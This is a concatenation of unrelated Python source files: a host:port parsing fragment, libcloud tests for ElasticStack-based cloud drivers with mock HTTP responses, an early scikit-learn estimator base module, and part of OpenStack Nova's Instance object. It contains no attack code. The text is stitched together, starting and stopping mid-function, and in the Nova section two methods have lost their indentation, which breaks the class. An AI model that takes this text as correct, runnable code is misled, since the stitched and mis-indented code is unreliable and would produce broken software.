        # Exactly one colon: interpret as host:port (IPv6 has >= 2 colons).
        candidate_host, _, candidate_port = candidate_host.rpartition(":")
        if not candidate_host:
            return None
        if not candidate_port:
            candidate_port = default_port
    candidate_host = candidate_host.strip()
    try:
        return (candidate_host, int(candidate_port))
    except ValueError:
        return None
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from libcloud.utils.py3 import httplib
from libcloud.compute.base import Node
from libcloud.compute.drivers.elasticstack import ElasticStackException
from libcloud.compute.drivers.elastichosts import \
ElasticHostsNodeDriver as ElasticHosts
from libcloud.compute.drivers.skalicloud import \
SkaliCloudNodeDriver as SkaliCloud
from libcloud.compute.drivers.serverlove import \
ServerLoveNodeDriver as ServerLove
from libcloud.common.types import InvalidCredsError, MalformedResponseError
from libcloud.test import MockHttp, unittest
from libcloud.test.file_fixtures import ComputeFileFixtures
class ElasticStackTestCase(object):
    """Shared tests for drivers built on the common ElasticStack platform.

    Subclasses mix this in together with ``unittest.TestCase``, assign
    ``self.driver`` and ``self.image`` in their own ``setUp`` and then
    call this ``setUp`` via ``super()``.
    """

    def setUp(self):
        # Re-use ElasticHosts fixtures for the base ElasticStack platform tests
        self.mockHttp = ElasticStackMockHttp
        self.mockHttp.type = None

        # id 72258 matches the server id handled by the mock's
        # _servers_72258_set response.
        self.node = Node(id=72258, name=None, state=None, public_ips=None,
                         private_ips=None, driver=self.driver)

    def test_invalid_creds(self):
        # The mock answers 401 for this type; the driver must translate
        # that into InvalidCredsError.
        self.mockHttp.type = 'UNAUTHORIZED'
        try:
            self.driver.list_nodes()
        except InvalidCredsError:
            # sys.exc_info() keeps the exception reference compatible with
            # both Python 2 and Python 3 scoping rules.
            e = sys.exc_info()[1]
            self.assertEqual(True, isinstance(e, InvalidCredsError))
        else:
            self.fail('test should have thrown')

    def test_malformed_response(self):
        # The mock returns invalid JSON for this type.
        self.mockHttp.type = 'MALFORMED'
        try:
            self.driver.list_nodes()
        except MalformedResponseError:
            pass
        else:
            self.fail('test should have thrown')

    def test_parse_error(self):
        self.mockHttp.type = 'PARSE_ERROR'
        try:
            self.driver.list_nodes()
        except Exception:
            e = sys.exc_info()[1]
            # The driver is expected to surface the X-Elastic-Error marker
            # in the raised error's message.
            self.assertTrue(str(e).find('X-Elastic-Error') != -1)
        else:
            self.fail('test should have thrown')

    def test_ex_set_node_configuration(self):
        success = self.driver.ex_set_node_configuration(node=self.node,
                                                        name='name',
                                                        cpu='2')
        self.assertTrue(success)

    def test_ex_set_node_configuration_invalid_keys(self):
        try:
            self.driver.ex_set_node_configuration(node=self.node, foo='bar')
        except ElasticStackException:
            pass
        else:
            self.fail(
                'Invalid option specified, but an exception was not thrown')

    def test_list_nodes(self):
        nodes = self.driver.list_nodes()
        self.assertTrue(isinstance(nodes, list))
        self.assertEqual(len(nodes), 1)

        node = nodes[0]
        self.assertEqual(node.public_ips[0], "1.2.3.4")
        self.assertEqual(node.public_ips[1], "1.2.3.5")
        self.assertEqual(node.extra['smp'], 1)
        self.assertEqual(
            node.extra['ide:0:0'], "b6049e7a-aa1b-47f9-b21d-cdf2354e28d3")

    def test_list_offline_node(self):
        # Offline servers carry no runtime attributes (ips, smp, started)
        # but still expose their attached drives.
        self.mockHttp.type = 'OFFLINE'
        nodes = self.driver.list_nodes()
        self.assertTrue(isinstance(nodes, list))
        self.assertEqual(len(nodes), 1)

        node = nodes[0]
        self.assertEqual(len(node.public_ips), 0, "Public IPs was not empty")
        self.assertNotIn('smp', node.extra)
        self.assertNotIn('started', node.extra)
        self.assertEqual(
            node.extra['ide:0:0'], "b6049e7a-aa1b-47f9-b21d-cdf2354e28d3")

    def test_list_sizes(self):
        images = self.driver.list_sizes()
        self.assertEqual(len(images), 6)
        image = [i for i in images if i.id == 'small'][0]
        self.assertEqual(image.id, 'small')
        self.assertEqual(image.name, 'Small instance')
        self.assertEqual(image.cpu, 2000)
        self.assertEqual(image.ram, 1700)
        self.assertEqual(image.disk, 160)
        self.assertTrue(isinstance(image.price, float))

    def test_list_images(self):
        # Every standard drive known to the driver must appear exactly once.
        images = self.driver.list_images()
        self.assertEqual(len(images), len(self.driver._standard_drives))

        for uuid, values in list(self.driver._standard_drives.items()):
            self.assertEqual(
                len([image for image in images if image.id == uuid]), 1)

    def test_reboot_node(self):
        node = self.driver.list_nodes()[0]
        self.assertTrue(self.driver.reboot_node(node))

    def test_destroy_node(self):
        node = self.driver.list_nodes()[0]
        self.assertTrue(self.driver.destroy_node(node))

    def test_create_node(self):
        sizes = self.driver.list_sizes()
        size = [s for s in sizes if s.id == 'large'][0]
        # self.image is provided by the concrete subclass's setUp.
        image = self.image

        self.assertTrue(self.driver.create_node(name="api.ivan.net.nz",
                                                image=image, size=size))
class ElasticHostsTestCase(ElasticStackTestCase, unittest.TestCase):
    """Runs the shared ElasticStack tests against the ElasticHosts driver
    and adds ElasticHosts-specific region handling tests.
    """

    def setUp(self):
        ElasticHosts.connectionCls.conn_class = ElasticStackMockHttp
        self.driver = ElasticHosts('foo', 'bar')
        images = self.driver.list_images()
        self.image = [i for i in images if
                      i.id == '38df0986-4d85-4b76-b502-3878ffc80161'][0]
        super(ElasticHostsTestCase, self).setUp()

    def test_multiple_drivers_with_different_regions(self):
        # Each driver instance must keep talking to its own regional API
        # endpoint, even after requests are issued on the other instance.
        driver1 = ElasticHosts('foo', 'bar', region='lon-p')
        driver2 = ElasticHosts('foo', 'bar', region='sat-p')

        self.assertTrue(driver1.connection.host.startswith('api-lon-p'))
        self.assertTrue(driver2.connection.host.startswith('api-sat-p'))

        driver1.list_nodes()
        driver2.list_nodes()
        driver1.list_nodes()

        self.assertTrue(driver1.connection.host.startswith('api-lon-p'))
        self.assertTrue(driver2.connection.host.startswith('api-sat-p'))

    def test_invalid_region(self):
        expected_msg = r'Invalid region.+'
        # assertRaisesRegexp was renamed to assertRaisesRegex in Python 3.2
        # and the deprecated alias was removed in Python 3.12; prefer the
        # new name when available, falling back for old interpreters.
        assert_raises_regex = getattr(self, 'assertRaisesRegex',
                                      getattr(self, 'assertRaisesRegexp',
                                              None))
        assert_raises_regex(ValueError, expected_msg, ElasticHosts,
                            'foo', 'bar', region='invalid')
class SkaliCloudTestCase(ElasticStackTestCase, unittest.TestCase):
    """Runs the shared ElasticStack tests against the SkaliCloud driver."""

    def setUp(self):
        # Route all HTTP traffic through the shared ElasticStack mock.
        SkaliCloud.connectionCls.conn_class = ElasticStackMockHttp
        self.driver = SkaliCloud('foo', 'bar')

        wanted_id = '90aa51f2-15c0-4cff-81ee-e93aa20b9468'
        matching = [img for img in self.driver.list_images()
                    if img.id == wanted_id]
        self.image = matching[0]
        super(SkaliCloudTestCase, self).setUp()
class ServerLoveTestCase(ElasticStackTestCase, unittest.TestCase):
    """Runs the shared ElasticStack tests against the ServerLove driver."""

    def setUp(self):
        # Route all HTTP traffic through the shared ElasticStack mock.
        ServerLove.connectionCls.conn_class = ElasticStackMockHttp
        self.driver = ServerLove('foo', 'bar')

        wanted_id = '679f5f44-0be7-4745-a658-cccd4334c1aa'
        matching = [img for img in self.driver.list_images()
                    if img.id == wanted_id]
        self.image = matching[0]
        super(ServerLoveTestCase, self).setUp()
class ElasticStackMockHttp(MockHttp):
    """Canned HTTP responses backing the ElasticStack driver tests.

    Method names encode the request path plus an optional scenario suffix
    (e.g. ``UNAUTHORIZED``) selected via the class-level ``type`` attribute.
    """

    fixtures = ComputeFileFixtures('elastichosts')

    def _servers_info_UNAUTHORIZED(self, method, url, body, headers):
        # 401 response to exercise the invalid-credentials path.
        return (httplib.UNAUTHORIZED, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _servers_info_MALFORMED(self, method, url, body, headers):
        # Deliberately invalid JSON to exercise response-parsing errors.
        body = "{malformed: '"
        return (httplib.OK, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _servers_info_PARSE_ERROR(self, method, url, body, headers):
        # 505 status to push the driver down its error-handling path.
        return (505, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _servers_b605ca90_c3e6_4cee_85f8_a8ebdf8f9903_reset(self, method, url, body, headers):
        return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _servers_b605ca90_c3e6_4cee_85f8_a8ebdf8f9903_destroy(self, method, url, body, headers):
        return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _drives_create(self, method, url, body, headers):
        body = self.fixtures.load('drives_create.json')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _drives_0012e24a_6eae_4279_9912_3432f698cec8_image_38df0986_4d85_4b76_b502_3878ffc80161_gunzip(self, method,
                                                                                                      url, body,
                                                                                                      headers):
        # ElasticHosts image
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _drives_0012e24a_6eae_4279_9912_3432f698cec8_image_90aa51f2_15c0_4cff_81ee_e93aa20b9468_gunzip(self, method,
                                                                                                      url, body,
                                                                                                      headers):
        # SkaliCloud image
        return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _drives_0012e24a_6eae_4279_9912_3432f698cec8_image_679f5f44_0be7_4745_a658_cccd4334c1aa_gunzip(self, method,
                                                                                                      url, body,
                                                                                                      headers):
        # ServerLove image
        return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])

    def _drives_0012e24a_6eae_4279_9912_3432f698cec8_info(self, method, url, body, headers):
        body = self.fixtures.load('drives_info.json')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _servers_create(self, method, url, body, headers):
        body = self.fixtures.load('servers_create.json')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _servers_info(self, method, url, body, headers):
        body = self.fixtures.load('servers_info.json')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _servers_info_OFFLINE(self, method, url, body, headers):
        # Fixture describing a server that is not running.
        body = self.fixtures.load('offline_servers_info.json')
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])

    def _servers_72258_set(self, method, url, body, headers):
        # Configuration update; an empty JSON object signals success.
        body = '{}'
        return (httplib.OK, body, {}, httplib.responses[httplib.OK])
# Allow running this test module directly.
if __name__ == '__main__':
    sys.exit(unittest.main())
| |
"""Base class for all estimators."""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD Style
import copy
import inspect
import numpy as np
from scipy import sparse
import warnings
from .metrics import r2_score
###############################################################################
def clone(estimator, safe=True):
    """Constructs a new estimator with the same parameters.

    Clone does a deep copy of the model in an estimator
    without actually copying attached data. It yields a new estimator
    with the same parameters that has not been fit on any data.

    Parameters
    ----------
    estimator: estimator object, or list, tuple or set of objects
        The estimator or group of estimators to be cloned

    safe: boolean, optional
        If safe is false, clone will fall back to a deepcopy on objects
        that are not estimators.

    Raises
    ------
    ValueError
        If ``estimator`` does not implement ``_get_params`` and ``safe``
        is True.
    """
    estimator_type = type(estimator)
    # XXX: not handling dictionaries
    if estimator_type in (list, tuple, set, frozenset):
        # Clone each member, preserving the container type.
        return estimator_type([clone(e, safe=safe) for e in estimator])
    elif not hasattr(estimator, '_get_params'):
        if not safe:
            return copy.deepcopy(estimator)
        else:
            raise ValueError("Cannot clone object '%s' (type %s): "
                    "it does not seem to be a scikit-learn estimator as "
                    "it does not implement a '_get_params' methods."
                    % (repr(estimator), type(estimator)))
    klass = estimator.__class__
    new_object_params = estimator._get_params(deep=False)
    # list(...) lets us mutate the dict while iterating; .items() (rather
    # than the Python-2-only .iteritems()) keeps this Py2/Py3 compatible.
    for name, param in list(new_object_params.items()):
        new_object_params[name] = clone(param, safe=False)
    new_object = klass(**new_object_params)
    params_set = new_object._get_params(deep=False)

    # Sanity check: the constructor must have stored every parameter
    # unmodified, otherwise cloning would silently change the model.
    for name in new_object_params:
        param1 = new_object_params[name]
        param2 = params_set[name]
        if isinstance(param1, np.ndarray):
            # For ndarrays, we do not test for complete equality; compare
            # shape/dtype and the first/last entries.  Guard empty arrays,
            # for which param1[0] would raise IndexError.
            equality_test = (param1.shape == param2.shape
                             and param1.dtype == param2.dtype
                             and (param1.size == 0
                                  or (param1[0] == param2[0]
                                      and param1[-1] == param2[-1])))
        elif sparse.issparse(param1):
            # For sparse matrices equality doesn't work; compare structure
            # and the first/last stored values.  Guard matrices with no
            # stored entries, for which data[0] would raise IndexError.
            equality_test = (param1.__class__ == param2.__class__
                             and param1.nnz == param2.nnz
                             and param1.shape == param2.shape
                             and (param1.nnz == 0
                                  or (param1.data[0] == param2.data[0]
                                      and param1.data[-1] == param2.data[-1])))
        else:
            equality_test = new_object_params[name] == params_set[name]
        assert equality_test, (
            'Cannot clone object %s, as the constructor does not '
            'seem to set parameter %s' % (estimator, name)
        )

    return new_object
###############################################################################
def _pprint(params, offset=0, printer=repr):
    """Pretty print the dictionary 'params'

    Parameters
    ----------
    params: dict
        The dictionary to pretty print

    offset: int
        The offset in characters to add at the begin of each line.

    printer:
        The function to convert entries to strings, typically
        the builtin str or repr

    Returns
    -------
    lines: str
        The multi-line, justified representation of ``params``.
    """
    # Do a multi-line justified repr:
    options = np.get_printoptions()
    np.set_printoptions(precision=5, threshold=64, edgeitems=2)
    params_list = list()
    this_line_length = offset
    line_sep = ',\n' + (1 + offset // 2) * ' '
    # sorted(params.items()) rather than the Python-2-only .iteritems();
    # sorting keeps the output deterministic.
    for i, (k, v) in enumerate(sorted(params.items())):
        if type(v) is float:
            # use str for representing floating point numbers
            # this way we get consistent representation across
            # architectures and versions.
            this_repr = '%s=%s' % (k, str(v))
        else:
            # use repr of the rest
            this_repr = '%s=%s' % (k, printer(v))
        if len(this_repr) > 500:
            # Truncate very long values, keeping the head and the tail.
            this_repr = this_repr[:300] + '...' + this_repr[-100:]
        if i > 0:
            # Wrap when the line would grow past 75 chars or the repr is
            # itself multi-line.
            if (this_line_length + len(this_repr) >= 75
                    or '\n' in this_repr):
                params_list.append(line_sep)
                this_line_length = len(line_sep)
            else:
                params_list.append(', ')
                this_line_length += 2
        params_list.append(this_repr)
        this_line_length += len(this_repr)

    np.set_printoptions(**options)
    lines = ''.join(params_list)
    # Strip trailing space to avoid nightmare in doctests
    lines = '\n'.join(l.rstrip(' ') for l in lines.split('\n'))
    return lines
###############################################################################
class BaseEstimator(object):
    """Base class for all estimators in the scikit learn

    Notes
    -----
    All estimators should specify all the parameters that can be set
    at the class level in their __init__ as explicit keyword
    arguments (no *args, **kwargs).
    """

    @classmethod
    def _get_param_names(cls):
        """Get parameter names for the estimator"""
        try:
            # fetch the constructor or the original constructor before
            # deprecation wrapping if any
            init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
            # introspect the constructor arguments to find the model
            # parameters to represent.  inspect.getargspec was removed in
            # Python 3.11; prefer getfullargspec and fall back only on
            # interpreters that lack it (Python 2).
            try:
                arg_spec = inspect.getfullargspec(init)
            except AttributeError:
                arg_spec = inspect.getargspec(init)
            args, varargs = arg_spec[0], arg_spec[1]
            assert varargs is None, (
                'scikit learn estimators should always specify their '
                'parameters in the signature of their init (no varargs).'
            )
            # Remove 'self'
            # XXX: This is going to fail if the init is a staticmethod, but
            # who would do this?
            args.pop(0)
        except TypeError:
            # No explicit __init__ (e.g. object's C-level constructor)
            args = []
        args.sort()
        return args

    def _get_params(self, deep=True):
        """Get parameters for the estimator

        Parameters
        ----------
        deep: boolean, optional
            If True, will return the parameters for this estimator and
            contained subobjects that are estimators.

        Returns
        -------
        params : dict
            Parameter names (possibly ``<component>__<param>`` for nested
            estimators) mapped to their values.
        """
        out = dict()
        for key in self._get_param_names():
            value = getattr(self, key)
            if deep and hasattr(value, '_get_params'):
                deep_items = value._get_params().items()
                out.update((key + '__' + k, val) for k, val in deep_items)
            out[key] = value
        return out

    def set_params(self, **params):
        """Set the parameters of the estimator.

        The method works on simple estimators as well as on nested
        objects (such as pipelines). The former have parameters of the
        form <component>__<parameter> so that it's possible to update
        each component of a nested object.

        Returns
        -------
        self
        """
        if not params:
            # Simple optimisation to gain speed (inspect is slow)
            return
        valid_params = self._get_params(deep=True)
        # .items() rather than the Python-2-only .iteritems().
        for key, value in params.items():
            split = key.split('__', 1)
            if len(split) > 1:
                # nested objects case
                name, sub_name = split
                assert name in valid_params, ('Invalid parameter %s '
                                              'for estimator %s' %
                                              (name, self))
                sub_object = valid_params[name]
                assert hasattr(sub_object, '_get_params'), (
                    'Parameter %s of %s is not an estimator, cannot set '
                    'sub parameter %s' %
                    (sub_name, self.__class__.__name__, sub_name)
                )
                sub_object.set_params(**{sub_name: value})
            else:
                # simple objects case
                assert key in valid_params, ('Invalid parameter %s '
                                             'for estimator %s' %
                                             (key, self.__class__.__name__))
                setattr(self, key, value)
        return self

    def _set_params(self, **params):
        # Deprecated alias kept for callers still passing params to fit.
        if params != {}:
            warnings.warn("Passing estimator parameters to fit is deprecated;"
                          " use set_params instead",
                          category=DeprecationWarning)
        return self.set_params(**params)

    def __repr__(self):
        class_name = self.__class__.__name__
        return '%s(%s)' % (
            class_name,
            _pprint(self._get_params(deep=False),
                    offset=len(class_name),
                    ),
        )

    def __str__(self):
        class_name = self.__class__.__name__
        return '%s(%s)' % (
            class_name,
            _pprint(self._get_params(deep=True),
                    offset=len(class_name),
                    printer=str,
                    ),
        )
###############################################################################
class ClassifierMixin(object):
    """Mixin class for all classifiers in scikit-learn"""

    def score(self, X, y):
        """Return the fraction of samples for which the prediction
        matches ``y`` (mean accuracy).

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]
            Training set.

        y : array-like, shape = [n_samples]
            Labels for X.

        Returns
        -------
        z : float
        """
        predictions = self.predict(X)
        return np.mean(predictions == y)
###############################################################################
class RegressorMixin(object):
    """Mixin class for all regression estimators in the scikit learn"""

    def score(self, X, y):
        """Return the coefficient of determination (R^2) of the prediction.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]
            Training set.

        y : array-like, shape = [n_samples]
            True target values for X.

        Returns
        -------
        z : float
        """
        predicted = self.predict(X)
        return r2_score(y, predicted)
###############################################################################
class TransformerMixin(object):
    """Mixin class for all transformers in the scikit learn"""

    def fit_transform(self, X, y=None, **fit_params):
        """Fit to data, then transform it

        Fits transformer to X and y with optional parameters fit_params
        and returns a transformed version of X.

        Parameters
        ----------
        X : numpy array of shape [n_samples, n_features]
            Training set.

        y : numpy array of shape [n_samples]
            Target values.

        Returns
        -------
        X_new : numpy array of shape [n_samples, n_features_new]
            Transformed array.

        Note
        -----
        This method just calls fit and transform consecutively, i.e., it is
        not an optimized implementation of fit_transform, unlike other
        transformers such as PCA.
        """
        if y is None:
            # Unsupervised transformation: fit takes X only.
            fitted = self.fit(X, **fit_params)
        else:
            # Supervised transformation: fit takes X and y.
            fitted = self.fit(X, y, **fit_params)
        return fitted.transform(X)
###############################################################################
# XXX: Temporary solution to figure out if an estimator is a classifier
def _get_sub_estimator(estimator):
    """Returns the final estimator if there is any."""
    # GridSearchCV and other CV-tuned estimators wrap the real model in an
    # ``estimator`` attribute; unwrap it first.
    if hasattr(estimator, 'estimator'):
        return _get_sub_estimator(estimator.estimator)
    # Pipelines expose their chain via ``steps``; the final step holds the
    # actual estimator.
    if hasattr(estimator, 'steps'):
        final_step = estimator.steps[-1]
        return _get_sub_estimator(final_step[1])
    return estimator
def is_classifier(estimator):
    """Returns True if the given estimator is (probably) a classifier."""
    # Unwrap meta-estimators (grid search, pipelines) before the check.
    final = _get_sub_estimator(estimator)
    return isinstance(final, ClassifierMixin)
| |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from nova.cells import opts as cells_opts
from nova.cells import rpcapi as cells_rpcapi
from nova.cells import utils as cells_utils
from nova import db
from nova import exception
from nova.i18n import _LE
from nova import notifications
from nova import objects
from nova.objects import base
from nova.objects import fields
from nova import utils
# Global oslo.config handle and module-level logger.
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# List of fields that can be joined in DB layer.
_INSTANCE_OPTIONAL_JOINED_FIELDS = ['metadata', 'system_metadata',
                                    'info_cache', 'security_groups',
                                    'pci_devices', 'tags']
# These are fields that are optional but don't translate to db columns
_INSTANCE_OPTIONAL_NON_COLUMN_FIELDS = ['fault', 'flavor', 'old_flavor',
                                        'new_flavor', 'ec2_ids']
# These are fields that are optional and in instance_extra
_INSTANCE_EXTRA_FIELDS = ['numa_topology', 'pci_requests',
                          'flavor', 'vcpu_model', 'migration_context']

# These are fields that can be specified as expected_attrs
INSTANCE_OPTIONAL_ATTRS = (_INSTANCE_OPTIONAL_JOINED_FIELDS +
                           _INSTANCE_OPTIONAL_NON_COLUMN_FIELDS +
                           _INSTANCE_EXTRA_FIELDS)
# These are fields that most query calls load by default
INSTANCE_DEFAULT_FIELDS = ['metadata', 'system_metadata',
                           'info_cache', 'security_groups']


def _expected_cols(expected_attrs):
    """Return expected_attrs that are columns needing joining.

    NB: This function may modify expected_attrs if one
    requested attribute requires another.
    """
    if not expected_attrs:
        return expected_attrs

    # Plain joined columns that were requested directly by name.
    simple_cols = []
    for attr in expected_attrs:
        if attr in _INSTANCE_OPTIONAL_JOINED_FIELDS:
            simple_cols.append(attr)

    # Fields living in the instance_extra table join as 'extra.<name>'.
    complex_cols = ['extra.%s' % field
                    for field in _INSTANCE_EXTRA_FIELDS
                    if field in expected_attrs]
    if complex_cols:
        # Any extra.* column requires the 'extra' table itself.
        simple_cols.append('extra')
    simple_cols = [col for col in simple_cols
                   if col not in _INSTANCE_EXTRA_FIELDS]
    return simple_cols + complex_cols


_NO_DATA_SENTINEL = object()
# TODO(berrange): Remove NovaObjectDictCompat
@base.NovaObjectRegistry.register
class Instance(base.NovaPersistentObject, base.NovaObject,
               base.NovaObjectDictCompat):
    # Version 2.0: Initial version
    VERSION = '2.0'

    fields = {
        # Identity / ownership
        'id': fields.IntegerField(),
        'user_id': fields.StringField(nullable=True),
        'project_id': fields.StringField(nullable=True),
        # Boot images and keys
        'image_ref': fields.StringField(nullable=True),
        'kernel_id': fields.StringField(nullable=True),
        'ramdisk_id': fields.StringField(nullable=True),
        'hostname': fields.StringField(nullable=True),

        'launch_index': fields.IntegerField(nullable=True),
        'key_name': fields.StringField(nullable=True),
        'key_data': fields.StringField(nullable=True),

        # Runtime state
        'power_state': fields.IntegerField(nullable=True),
        'vm_state': fields.StringField(nullable=True),
        'task_state': fields.StringField(nullable=True),

        # Resource sizing
        'memory_mb': fields.IntegerField(nullable=True),
        'vcpus': fields.IntegerField(nullable=True),
        'root_gb': fields.IntegerField(nullable=True),
        'ephemeral_gb': fields.IntegerField(nullable=True),
        'ephemeral_key_uuid': fields.UUIDField(nullable=True),

        # Placement
        'host': fields.StringField(nullable=True),
        'node': fields.StringField(nullable=True),

        'instance_type_id': fields.IntegerField(nullable=True),

        'user_data': fields.StringField(nullable=True),

        'reservation_id': fields.StringField(nullable=True),

        'launched_at': fields.DateTimeField(nullable=True),
        'terminated_at': fields.DateTimeField(nullable=True),

        'availability_zone': fields.StringField(nullable=True),

        'display_name': fields.StringField(nullable=True),
        'display_description': fields.StringField(nullable=True),

        'launched_on': fields.StringField(nullable=True),

        # NOTE(jdillaman): locked deprecated in favor of locked_by,
        # to be removed in Icehouse
        'locked': fields.BooleanField(default=False),
        'locked_by': fields.StringField(nullable=True),

        'os_type': fields.StringField(nullable=True),
        'architecture': fields.StringField(nullable=True),
        'vm_mode': fields.StringField(nullable=True),
        'uuid': fields.UUIDField(),

        'root_device_name': fields.StringField(nullable=True),
        'default_ephemeral_device': fields.StringField(nullable=True),
        'default_swap_device': fields.StringField(nullable=True),
        'config_drive': fields.StringField(nullable=True),

        'access_ip_v4': fields.IPV4AddressField(nullable=True),
        'access_ip_v6': fields.IPV6AddressField(nullable=True),

        'auto_disk_config': fields.BooleanField(default=False),
        'progress': fields.IntegerField(nullable=True),

        'shutdown_terminate': fields.BooleanField(default=False),
        'disable_terminate': fields.BooleanField(default=False),

        'cell_name': fields.StringField(nullable=True),

        # Optional/joined attributes (see INSTANCE_OPTIONAL_ATTRS)
        'metadata': fields.DictOfStringsField(),
        'system_metadata': fields.DictOfNullableStringsField(),

        'info_cache': fields.ObjectField('InstanceInfoCache',
                                         nullable=True),

        'security_groups': fields.ObjectField('SecurityGroupList'),

        'fault': fields.ObjectField('InstanceFault', nullable=True),

        'cleaned': fields.BooleanField(default=False),

        'pci_devices': fields.ObjectField('PciDeviceList', nullable=True),
        'numa_topology': fields.ObjectField('InstanceNUMATopology',
                                            nullable=True),
        'pci_requests': fields.ObjectField('InstancePCIRequests',
                                           nullable=True),
        'tags': fields.ObjectField('TagList'),
        'flavor': fields.ObjectField('Flavor'),
        'old_flavor': fields.ObjectField('Flavor', nullable=True),
        'new_flavor': fields.ObjectField('Flavor', nullable=True),
        'vcpu_model': fields.ObjectField('VirtCPUModel', nullable=True),
        'ec2_ids': fields.ObjectField('EC2Ids'),
        'migration_context': fields.ObjectField('MigrationContext',
                                                nullable=True)
        }

    # 'name' is computed from the instance_name_template (see the property).
    obj_extra_fields = ['name']
    def __init__(self, *args, **kwargs):
        """Initialize the object and start tracking metadata mutations."""
        super(Instance, self).__init__(*args, **kwargs)
        self._reset_metadata_tracking()
    def _reset_metadata_tracking(self, fields=None):
        # Snapshot metadata/system_metadata so obj_what_changed() can spot
        # in-place mutations of these dicts, which ordinary field-level
        # change tracking would miss.
        if fields is None or 'system_metadata' in fields:
            self._orig_system_metadata = (dict(self.system_metadata) if
                                          'system_metadata' in self else {})
        if fields is None or 'metadata' in fields:
            self._orig_metadata = (dict(self.metadata) if
                                   'metadata' in self else {})
    def obj_reset_changes(self, fields=None, recursive=False):
        """Reset change tracking, refreshing the metadata snapshots too."""
        super(Instance, self).obj_reset_changes(fields,
                                                recursive=recursive)
        self._reset_metadata_tracking(fields=fields)
def obj_what_changed(self):
changes = super(Instance, self).obj_what_changed()
if 'metadata' in self and self.metadata != self._orig_metadata:
changes.add('metadata')
if 'system_metadata' in self and (self.system_metadata !=
self._orig_system_metadata):
changes.add('system_metadata')
return changes
    @classmethod
    def _obj_from_primitive(cls, context, objver, primitive):
        """Rehydrate from a primitive, re-arming metadata tracking."""
        self = super(Instance, cls)._obj_from_primitive(context, objver,
                                                        primitive)
        # The deserialized dicts are the new baseline for change detection.
        self._reset_metadata_tracking()
        return self
    @property
    def name(self):
        """Display name rendered from CONF.instance_name_template."""
        try:
            # Simple templates interpolate the integer id directly.
            base_name = CONF.instance_name_template % self.id
        except TypeError:
            # Support templates like "uuid-%(uuid)s", etc.
            info = {}
            # NOTE(russellb): Don't use self.iteritems() here, as it will
            # result in infinite recursion on the name property.
            for key in self.fields:
                if key == 'name':
                    # NOTE(danms): prevent recursion
                    continue
                elif not self.obj_attr_is_set(key):
                    # NOTE(danms): Don't trigger lazy-loads
                    continue
                info[key] = self[key]
            try:
                base_name = CONF.instance_name_template % info
            except KeyError:
                # Template references a key we don't have; fall back.
                base_name = self.uuid
        return base_name
def _flavor_from_db(self, db_flavor):
"""Load instance flavor information from instance_extra."""
flavor_info = jsonutils.loads(db_flavor)
self.flavor = objects.Flavor.obj_from_primitive(flavor_info['cur'])
if flavor_info['old']:
self.old_flavor = objects.Flavor.obj_from_primitive(
flavor_info['old'])
else:
self.old_flavor = None
if flavor_info['new']:
self.new_flavor = objects.Flavor.obj_from_primitive(
flavor_info['new'])
else:
self.new_flavor = None
self.obj_reset_changes(['flavor', 'old_flavor', 'new_flavor'])
    @staticmethod
    def _from_db_object(context, instance, db_inst, expected_attrs=None):
        """Method to help with migration to objects.

        Converts a database entity to a formal object.
        """
        instance._context = context
        if expected_attrs is None:
            expected_attrs = []
        # Most of the field names match right now, so be quick
        for field in instance.fields:
            if field in INSTANCE_OPTIONAL_ATTRS:
                # Optional attrs are only loaded when requested (below).
                continue
            elif field == 'deleted':
                # The DB marks deletion by setting deleted == id; reduce
                # that to a boolean here.
                instance.deleted = db_inst['deleted'] == db_inst['id']
            elif field == 'cleaned':
                instance.cleaned = db_inst['cleaned'] == 1
            else:
                instance[field] = db_inst[field]

        # NOTE(danms): We can be called with a dict instead of a
        # SQLAlchemy object, so we have to be careful here
        if hasattr(db_inst, '__dict__'):
            have_extra = 'extra' in db_inst.__dict__ and db_inst['extra']
        else:
            have_extra = 'extra' in db_inst and db_inst['extra']

        if 'metadata' in expected_attrs:
            instance['metadata'] = utils.instance_meta(db_inst)
        if 'system_metadata' in expected_attrs:
            instance['system_metadata'] = utils.instance_sys_meta(db_inst)
        if 'fault' in expected_attrs:
            instance['fault'] = (
                objects.InstanceFault.get_latest_for_instance(
                    context, instance.uuid))

        # Each instance_extra-backed attribute loads from the joined
        # 'extra' row when present, else is explicitly set to None.
        if 'numa_topology' in expected_attrs:
            if have_extra:
                instance._load_numa_topology(
                    db_inst['extra'].get('numa_topology'))
            else:
                instance.numa_topology = None
